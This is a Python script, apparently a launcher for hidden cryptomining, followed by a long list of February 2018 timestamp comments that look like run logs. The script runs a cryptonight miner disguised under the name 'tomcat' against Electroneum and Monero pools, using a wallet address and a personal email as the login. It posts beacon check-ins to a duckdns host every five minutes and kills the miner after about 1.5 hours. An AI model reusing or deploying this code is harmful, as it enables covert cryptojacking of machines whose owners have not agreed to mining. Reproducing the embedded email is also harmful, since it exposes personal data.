import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:19:03.823660
#2018-02-17 17:06:01.955921
#2018-02-17 18:54:03.987116
#2018-02-17 20:44:04.158132
#2018-02-17 22:31:03.865605
#2018-02-18 00:31:01.490558
#2018-02-18 02:10:07.563889
#2018-02-18 03:40:07.589006
#2018-02-18 05:15:05.118372
#2018-02-18 06:53:06.237552
#2018-02-18 08:23:04.498339
#2018-02-18 09:55:04.259143
#2018-02-18 11:28:05.676306
#2018-02-18 13:01:05.821730
#2018-02-18 14:36:04.243067
#2018-02-18 16:14:06.235127
#2018-02-18 17:45:06.413549
#2018-02-18 19:16:05.139587
#2018-02-18 20:47:05.855257
#2018-02-18 22:19:06.094385
#2018-02-18 23:54:06.419132
#2018-02-19 01:25:07.242753
#2018-02-19 02:58:03.223623
#2018-02-19 04:30:10.451163
#2018-02-19 06:03:07.577172
#2018-02-19 07:42:01.659137
#2018-02-19 09:16:06.845457
#2018-02-19 10:48:08.455917
#2018-02-19 12:21:07.072333
#2018-02-19 13:52:08.604532
#2018-02-19 15:26:05.337957
#2018-02-19 16:59:08.547550
#2018-02-19 18:33:09.556209
#2018-02-19 20:06:06.440708
#2018-02-19 21:41:07.569528
#2018-02-19 23:13:05.675304
#2018-02-20 00:45:03.191197
#2018-02-20 02:25:06.885556
#2018-02-20 03:59:06.419347
#2018-02-20 05:29:05.386788
#2018-02-20 07:02:06.218575
#2018-02-20 08:38:08.850782
#2018-02-20 10:09:07.056558
#2018-02-20 11:43:08.691453
#2018-02-20 13:20:08.598941
#2018-02-20 14:50:10.137453
#2018-02-20 16:25:14.038017
#2018-02-20 18:02:04.560962
#2018-02-20 19:34:02.189971
#2018-02-20 21:12:07.469796
#2018-02-20 22:43:03.928717
#2018-02-21 00:14:01.665068
#2018-02-21 01:52:07.434258
#2018-02-21 03:27:05.601696
#2018-02-21 05:00:01.433996
#2018-02-21 06:37:06.922458
#2018-02-21 08:08:06.240826
#2018-02-21 09:44:04.881443
#2018-02-21 11:20:06.555089
#2018-02-21 12:51:08.099687
#2018-02-21 14:24:07.218118
#2018-02-21 15:56:10.543960
#2018-02-21 17:35:12.270481
#2018-02-21 19:05:10.999740
#2018-02-21 20:40:04.486075
#2018-02-21 22:19:02.226552
#2018-02-21 23:54:05.618726
#2018-02-22 01:31:01.807920
#2018-02-22 03:06:07.616827
#2018-02-22 04:37:06.459756
#2018-02-22 06:09:08.404764
#2018-02-22 07:42:01.592948
#2018-02-22 09:18:08.149196
#2018-02-22 10:52:04.972893
#2018-02-22 12:24:04.064766
#2018-02-22 13:56:11.911339
#2018-02-22 15:32:08.151858
#2018-02-22 17:03:10.049824
#2018-02-22 18:40:06.897475
#2018-02-22 20:17:06.629216
#2018-02-22 21:51:06.559956
#2018-02-22 23:24:07.014896
#2018-02-23 00:56:07.588426
#2018-02-23 02:31:07.283806
#2018-02-23 04:05:07.875146
#2018-02-23 05:36:03.893768
#2018-02-23 07:17:04.322018
#2018-02-23 08:57:05.551096
#2018-02-23 10:56:08.837765
#2018-02-23 12:06:07.278060
#2018-02-23 13:40:04.310124
#2018-02-23 15:11:02.182902
#2018-02-23 16:46:10.143499
#2018-02-23 18:16:07.429143
#2018-02-23 19:49:01.696600
#2018-02-23 21:19:08.050665
#2018-02-23 22:56:01.599471
#2018-02-24 00:31:04.855151
#2018-02-24 02:18:06.947168
#2018-02-24 03:53:05.702671
#2018-02-24 05:20:01.266874
#2018-02-24 06:57:07.013287
#2018-02-24 08:30:09.442280
#2018-02-24 09:59:05.406689
#2018-02-24 11:44:01.996645
#2018-02-24 13:11:05.675471
#2018-02-24 14:44:01.792413
#2018-02-24 16:18:01.341953
#2018-02-24 17:54:04.377873
#2018-02-24 19:22:08.103729
#2018-02-24 20:58:04.129466
#2018-02-24 22:56:02.057341
#2018-02-25 01:24:05.617649
#2018-02-25 04:56:07.000099
#2018-02-25 09:25:01.287377